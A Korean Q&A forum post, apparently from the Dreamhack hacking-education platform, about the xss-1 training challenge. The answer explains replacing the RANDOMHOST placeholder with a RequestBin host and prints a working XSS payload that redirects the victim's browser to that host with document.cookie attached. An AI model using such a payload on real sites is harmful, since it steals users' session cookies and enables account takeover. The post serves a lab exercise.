완료됨
xss-1 문제: 웹 서버 사용하여 푸는 방법이 안 되는 것 같습니다.
강의 파트:
https://learn.dreamhack.io/184#5
강의에서 xss-1 문제 풀이 방법 중 하나로 외부에서 접근 가능한 웹 서버를 통해 탈취한 쿠키를 확인할 수 있다고 나와 있지만 직접 예시 페이로드로 확인했을 때 응답을 확인할 수 없었습니다.
#웹해킹
작성자 정보
답변
1
페이로드 전송할 때 예시 페이로드를 그대로 사용하시면 안되고 RANDOMHOST 부분을 RequestBin 주소의 호스트(생성할 때마다 달라집니다.)로 바꾸셔야 합니다.
예를 들어 RequestBin에서 https://qwerty.request.dreamhack.games라는 주소를 할당 받았으면 다음과 같이 페이로드를 구성할 수 있습니다.
<script>location.href = "http://qwerty.request.dreamhack.games/?memo=" + document.cookie;</script>